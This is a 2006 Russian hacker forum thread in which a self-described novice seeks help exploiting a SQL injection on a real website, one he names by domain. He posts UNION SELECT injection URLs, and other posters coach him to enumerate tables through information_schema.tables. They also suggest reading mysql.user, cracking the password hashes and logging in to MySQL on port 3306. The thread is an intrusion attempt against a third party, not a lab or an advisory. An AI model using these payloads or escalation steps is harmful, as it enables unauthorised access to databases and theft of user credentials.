SQL команды
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
SQL команды - 2006-10-22 23:47:14.243333
|
|
|
ХAКEP
Сообщений: 97
Оценки: 0
Присоединился: 2005-06-19 20:44:27
|
Перечислите все известные вам команды для узнавания чего либо из БД. Например я знаю USER(), DATABASE(), SUSTEM_USER(), VERSION… Может есть ещё что нибудь полезное. К стати как узнать (не гадая) название таблицы в БД, если injection на сайте присутствует, а то я уже замучился гадать8|. Стандартные таблицы типа user, password, pwd не проходят[&:]. На запрос типа www.site.ru/?id=-1+union+select+1,2,user,4,5,6+from+vbel_/*&tmpl=full скрипт выплёвывает ответ DB Error: no such table. При всё при этом vbel_ - это таблица которую я узнал запросом www.site.ru/?id=-1+union+select+1,2,DATABASE(),4,5,6/*&tmpl=full
|
|
|
|
|
RE: SQL команды - 2006-10-23 02:06:33.946666
|
|
|
Сhaos_Сode
Сообщений: 1049
Оценки: 0
Присоединился: 2006-01-12 11:54:12
|
если MySQL 5, то можно попытаться обратиться к БД information_schema, где хранится список всех таблиц. Возможно, админы не закрыли к ней доступ на чтение.
|
|
|
|
|
RE: SQL команды - 2006-10-23 02:47:52.320000
|
|
|
BuriK666
Сообщений: 349
Оценки: 0
Присоединился: 2005-06-21 08:47:59
|
showdatabases
show tables
|
|
|
|
|
RE: SQL команды - 2006-10-23 04:29:21.150000
|
|
|
Сhaos_Сode
Сообщений: 1049
Оценки: 0
Присоединился: 2006-01-12 11:54:12
|
quote:
showdatabases
show tables
Через union не сработает.
|
|
|
|
|
RE: SQL команды - 2006-10-23 04:37:56.600000
|
|
|
KPOT_f!nd
Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
|
quote:
Через union не сработает.
С чего ты взял?
:@ZLOY
|
|
|
|
|
RE: SQL команды - 2006-10-23 17:55:53.663333
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
С того. Учи SQL :)
|
|
|
|
|
RE: SQL команды - 2006-10-23 19:45:34.976666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: ХAКEP
При всё при этом vbel_ - это таблица которую я узнал запросом www.site.ru/?id=-1+union+select+1,2,DATABASE(),4,5,6/*&tmpl=full
ржунимагу. функция DATABASE() возвращает имя текущей базы данных, а не таблицы. попробуй выбирать поле table_name из information_schema.tables может получится. есть доступ к mysql.user? можно попробовать расшифровать хеши юзверей и залогиниться на 3306 порт для большей свободы
|
|
|
|
|
RE: SQL команды - 2006-10-23 23:42:17.256666
|
|
|
ХAКEP
Сообщений: 97
Оценки: 0
Присоединился: 2005-06-19 20:44:27
|
quote:
ORIGINAL: Dimonelite
ржунимагу. функция DATABASE() возвращает имя текущей базы данных, а не таблицы. попробуй выбирать поле table_name из information_schema.tables может получится. есть доступ к mysql.user? можно попробовать расшифровать хеши юзверей и залогиниться на 3306 порт для большей свободы
Составил запрос http://europa.vbelgorode.ru/?id=-1+union+select+1,table_name,3,4,5,6+from+information_schema/*&tmpl=full не пашет выдаёт DB Error: no such table. Может я чёто не так делаю…я в этом деле (SQL inj) новичёк.8|
|
|
|
|
|
RE: SQL команды - 2006-10-24 19:22:37.400000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: ХAКEP
Составил запрос http://europa.vbelgorode.ru/?id=-1+union+select+1,table_name,3,4,5,6+from+information_schema/*&tmpl=full не пашет выдаёт DB Error: no such table. Может я чёто не так делаю…я в этом деле (SQL inj) новичёк.8|
конечно не так! читай мои сообщения более тщательно, я писал from information_schema.tables
information_schema - это БД, а tables - это таблица в этой БД. выбирать надо из information_schema.tables
|
|
|
|
|
|
